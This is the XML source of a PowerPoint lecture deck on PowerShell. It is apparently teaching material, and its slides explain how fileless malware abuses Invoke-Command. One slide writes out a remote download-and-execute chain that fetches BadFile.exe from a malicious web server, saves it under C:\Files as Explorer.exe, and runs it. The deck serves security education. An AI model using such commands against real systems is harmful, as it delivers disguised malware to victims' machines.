              <a:t>of its job is to allow for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>the remote administration of Windows servers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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware attack uses exactly the same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cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and techniques as an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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> might use to remotely manage their servers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>such,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does not view such an attack as being malicious; it sees it as legitimate administrative activity. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>previously noted, though,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itself is not to blame for such an attack. It’s the administrator’s job to harden servers and the underlying infrastructure to the point that an attacker is unable to launch a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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malware attack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89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 smtClean="0"/>
              <a:t>Why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3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sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Doesn’t Do Anything </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Malware Attack?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Brien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Posey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4754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4"/>
            <a:ext cx="7948405" cy="48245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 = 456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</a:t>
            </a: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$b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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW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</a:t>
            </a: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 = get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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$c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Restricted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&gt; </a:t>
            </a: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$c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Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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endParaRPr lang="en-US" altLang="zh-TW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Restricted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware attack based on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dirty="0"/>
              <a:t> uses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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>native capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to attack the victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" u="sng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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> cmdlets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that is best suited to such an attack is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cmdlet. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cmdlet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is used to run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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altLang="zh-TW" u="sng" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, or even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>an entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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 block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, against a remote system.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cmdlet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4"/>
              </a:rPr>
              <a:t>Brien Posey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98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568952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TW" sz="17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 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ComputerName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7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FileServer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{Get-Process | Where-Object {$_.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7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zh-TW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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Explorer’}}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="17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The above command uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the 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ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> parameter to target a remote system named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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FileServer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cmdlet is intended for use in managing remote systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>such, you would simply replace the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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FileServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> with the name of the remote computer that you want to “manage.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a: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48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The next parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>is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This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>parameter is followed by the code that should be run on the remote system.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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> cmdlet and a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Where-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>are used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>look at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Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process.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Get-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet as a stand-in for malicious code.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example -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dirty="0" smtClean="0"/>
              <a:t> Parameter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01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Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>instructions that are included in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ScriptBlock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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> are executed against the target system.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only real problem with attackers using this technique is that scripts very often make use of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Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>variables that are created while using this technique exist solely on the remote system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>an attack is to succeed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, attackers may need to extract information from the remote system and write it to a variable that is local to their own systems. That way, they can issue subsequent commands based on the variable’s contents.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Implications of the Example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3"/>
              </a:rPr>
              <a:t>Brien Posey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43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attackers want to write information about a remote system to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, they can do so by mapping the variable to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dirty="0"/>
              <a:t> cmdlet rather than assigning the variable from within the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Value of a Local Variable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4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496944" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The command shown below, for example, retrieves information about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Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> process from the remote machine and writes that information to a local variable (residing on attackers’ own systems) called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$Explorer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$Explorer = Invoke-Command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ComputerName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FileServer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{Get-Process | Where-Object {$_.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ProcessName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zh-TW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‘Explorer’}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="16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92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i="1" dirty="0" smtClean="0"/>
              <a:t>An Attacker’s Computer Directs a Victim’s Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" dirty="0" smtClean="0"/>
              <a:t>Download Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Brien Posey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Fileless Malw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39"/>
            <a:ext cx="3672408" cy="43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5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2564904"/>
            <a:ext cx="885698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 -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ComputerName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FileServer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zh-TW" sz="18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New-Item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-Path “C:\” -Name “Files” -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ItemType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“Directory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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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WebRequest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-URI ‘http:///BadFile.exe’ -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‘C:\Files\Explorer.exe’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="18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Invoke-Expression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-Command “cmd.exe /c c:\files\explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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endParaRPr lang="en-US" altLang="zh-TW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1800" dirty="0"/>
              <a:t>Once again, attackers are using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Invoke-Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> cmdlet to establish a remote connection to a remote computer named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FileServer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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>contents of the command’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> are being run on the remote machine.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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Code Example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88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first command simply creates a new folder called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Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> on the victim’s hard disk. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>folder will act as a repository for the malware.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Explanation of the First Command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35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The second command downloads the malware from a malicious web server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>thing to notice about this command is that it is possible to rename the malware as a part of the process. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>this case, for example, the file that is being downloaded from the web server is initially named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BadFile.exe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However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, this command renames the file using the much less conspicuous name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Explorer.exe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downloaded file is being saved to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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C:\Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> folder that was created by the previous command.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C78C-8FDE-4FCF-9D21-7AA0D5AA827C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>99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Explanation of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Brien Posey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r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5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9800</TotalTime>
  <Words>7323</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>934</Paragraphs>
  <Slides>122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122</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="123" baseType="lpstr">
      <vt:lpstr>波形</vt:lpstr>
      <vt:lpstr>Powershell</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerShell Interpreter  </vt:lpstr>
      <vt:lpstr>PowerShell Execution Options        [Max Malyutin]</vt:lpstr>
      <vt:lpstr>Windows PowerShell 開始使用手冊 [forsenergy]</vt:lpstr>
      <vt:lpstr>PowerShell Function [cynet]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>物件 [Office Guide]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Single-Quoted Strings (‘) [SS64.com]</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Exception [SS64.com]</vt:lpstr>
      <vt:lpstr>Double-Quoted Strings (") [SS64.com]</vt:lpstr>
      <vt:lpstr>Examples [SS64.com]</vt:lpstr>
      <vt:lpstr>““abc”” Is not a String</vt:lpstr>
      <vt:lpstr>Combining Single-Quoted Strings and Double-Quoted Strings [SS64.com]</vt:lpstr>
      <vt:lpstr>Examples [SS64.com] </vt:lpstr>
      <vt:lpstr>資料物件[Office Guide]</vt:lpstr>
      <vt:lpstr>日期與時間的處理[Office Guide]</vt:lpstr>
      <vt:lpstr>組合多項指令[Office Guide]</vt:lpstr>
      <vt:lpstr>Example 1 [Office Guide]</vt:lpstr>
      <vt:lpstr>Example 2 [Office Guide]</vt:lpstr>
      <vt:lpstr>別名[Office Guide]</vt:lpstr>
      <vt:lpstr>查詢指令與物件用法 (1)  [Office Guide]</vt:lpstr>
      <vt:lpstr>查詢指令與物件用法 (2)  [Office Guide]</vt:lpstr>
      <vt:lpstr>查詢物件(1)  [Office Guide]</vt:lpstr>
      <vt:lpstr>查詢物件(2)[Office Guide]</vt:lpstr>
      <vt:lpstr>PowerShell 指令的組成 [Michelle Chen]</vt:lpstr>
      <vt:lpstr>PowerShell 內建的功能[Michelle Chen]</vt:lpstr>
      <vt:lpstr>在 PowerShell 中撰寫多行程式 [Michelle Chen]</vt:lpstr>
      <vt:lpstr>Windows PowerShell parameters/CLI [Microsoft][mklement0]</vt:lpstr>
      <vt:lpstr>PowerShell.exe [Microsoft]</vt:lpstr>
      <vt:lpstr>Script Block [Microsoft]</vt:lpstr>
      <vt:lpstr>Syntax [Microsoft]</vt:lpstr>
      <vt:lpstr>Return Results [Microsoft]</vt:lpstr>
      <vt:lpstr>Parameters [Microsoft]</vt:lpstr>
      <vt:lpstr>Script Block Type [Microsoft]</vt:lpstr>
      <vt:lpstr>ScriptBlock Type [Microsoft]</vt:lpstr>
      <vt:lpstr>Command Parameters [Microsoft]</vt:lpstr>
      <vt:lpstr>Parameter Blocks [Microsoft]</vt:lpstr>
      <vt:lpstr>Execution Result</vt:lpstr>
      <vt:lpstr>Variables and Script Blocks [Microsoft]</vt:lpstr>
      <vt:lpstr>Call Operator [Microsoft]</vt:lpstr>
      <vt:lpstr>呼叫運算子 &amp; [Micorsoft]</vt:lpstr>
      <vt:lpstr>Variable Value without Quotes</vt:lpstr>
      <vt:lpstr>ScriptBlock [SS64]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Multiple lines [SS64]</vt:lpstr>
      <vt:lpstr>Continuation Character [SS64]</vt:lpstr>
      <vt:lpstr>-Command [Microsoft]</vt:lpstr>
      <vt:lpstr>-Command [Microsoft]</vt:lpstr>
      <vt:lpstr>-Command [powershell -?]</vt:lpstr>
      <vt:lpstr> [powershell -?]</vt:lpstr>
      <vt:lpstr> [powershell -?]</vt:lpstr>
      <vt:lpstr> [powershell -?]</vt:lpstr>
      <vt:lpstr>範例[powershell -?]</vt:lpstr>
      <vt:lpstr>指令稿[Office Guide]</vt:lpstr>
      <vt:lpstr>PowerShell l 指令稿 Example [Office Guide]</vt:lpstr>
      <vt:lpstr>PowerShell 重新導向操作員 [Office Guide]</vt:lpstr>
      <vt:lpstr>Operators  [SS64] [Micorsoft]</vt:lpstr>
      <vt:lpstr>背景運算子 &amp; [Micorsoft]</vt:lpstr>
      <vt:lpstr>Microsoft.PowerShell.Utility Module [Microsoft] </vt:lpstr>
      <vt:lpstr>What is a PowerShell command (cmdlet) [Microsoft] [Stephen J. Bigelow]</vt:lpstr>
      <vt:lpstr>cmdlet names [Microsoft]</vt:lpstr>
      <vt:lpstr>cmdlet [Stephen J. Bigelow]</vt:lpstr>
      <vt:lpstr>How do cmdlets work? [Stephen J. Bigelow]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Syntax</vt:lpstr>
      <vt:lpstr>Description</vt:lpstr>
      <vt:lpstr>Example 1: Evaluate an Expression</vt:lpstr>
      <vt:lpstr>Variable Does not Contain a String</vt:lpstr>
      <vt:lpstr>Explanation of Example 1</vt:lpstr>
      <vt:lpstr>Example 1-1</vt:lpstr>
      <vt:lpstr>Example 1-2</vt:lpstr>
      <vt:lpstr>Example 1-3</vt:lpstr>
      <vt:lpstr>Example 1-4</vt:lpstr>
      <vt:lpstr>Example 1-5</vt:lpstr>
      <vt:lpstr>Example 2:  Run a script on the local computer</vt:lpstr>
      <vt:lpstr>Example 3: Run a command in a variable</vt:lpstr>
      <vt:lpstr>Example 3-1</vt:lpstr>
      <vt:lpstr>cmdlet Invoke-Expression (1) [Dave-ee Jones][腾讯云开发者]</vt:lpstr>
      <vt:lpstr>cmdlet Invoke-Expression (2) [Dave-ee Jones]</vt:lpstr>
      <vt:lpstr>iex Example</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Invoke-Expression</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Why PowerShell Doesn’t Do Anything to Stop a Fileless Malware Attack? [Brien Posey]</vt:lpstr>
      <vt:lpstr>Invoke-Command cmdlet [Brien Posey]</vt:lpstr>
      <vt:lpstr>Invoke-Command Example [Brien Posey]</vt:lpstr>
      <vt:lpstr>Invoke-Command Example - -ScriptBlock Parameter [Brien Posey]</vt:lpstr>
      <vt:lpstr>Implications of the Example [Brien Posey]</vt:lpstr>
      <vt:lpstr>Value of a Local Variable [Brien Posey]</vt:lpstr>
      <vt:lpstr>Example [Brien Posey]</vt:lpstr>
      <vt:lpstr>An Attacker’s Computer Directs a Victim’s Computer to Download Malware [Brien Posey]</vt:lpstr>
      <vt:lpstr>Code Example [Brien Posey] </vt:lpstr>
      <vt:lpstr>Explanation of the First Command [Brien Posey] </vt:lpstr>
      <vt:lpstr>Explanation of the Second Command [Brien Posey] </vt:lpstr>
      <vt:lpstr>Explanation of the Third Command [Brien Posey] </vt:lpstr>
      <vt:lpstr>Loading Scripts Directly in Memory [Macfee]</vt:lpstr>
      <vt:lpstr>Explanation [Macfee] </vt:lpstr>
      <vt:lpstr>Running Scripts without the Default PowerShell Interpreter [Macfee] </vt:lpstr>
      <vt:lpstr>Example [Macfee]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>javascript Execute powershell Script [codegrepper] </vt:lpstr>
      <vt:lpstr>Simple PowerShell Example [cynet]</vt:lpstr>
      <vt:lpstr>PowerShell Fileless Attack Example [cynet]</vt:lpstr>
      <vt:lpstr>Use a Macro to Download and Execute a Remote File</vt:lpstr>
      <vt:lpstr>Download and Execute a Remote File Using a HTA File [cyber one]</vt:lpstr>
      <vt:lpstr>PowerShell Execution Options [cynet]</vt:lpstr>
      <vt:lpstr>Obfuscation - Concatenation [cynet]</vt:lpstr>
      <vt:lpstr>Reordering –  Concatenation [cynet]</vt:lpstr>
      <vt:lpstr>Escaping Character –  Concatenation [cynet]</vt:lpstr>
      <vt:lpstr>Base64 Format –  Concatenation [cynet]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> [powershell -?]</vt:lpstr>
      <vt:lpstr>URLs of Powershell Articles</vt:lpstr>
      <vt:lpstr>String Parameters [Microsoft]</vt:lpstr>
      <vt:lpstr>呼叫運算子 &amp; [SS64]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Powershell</dc:title>
  <dc:creator>Fu-Hau H</dc:creator>
  <cp:lastModifiedBy>Fu-Hau H</cp:lastModifiedBy>
  <cp:revision>234</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-11T03:07:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-05T13:52:51Z</dcterms:modified>
</cp:coreProperties>
</file>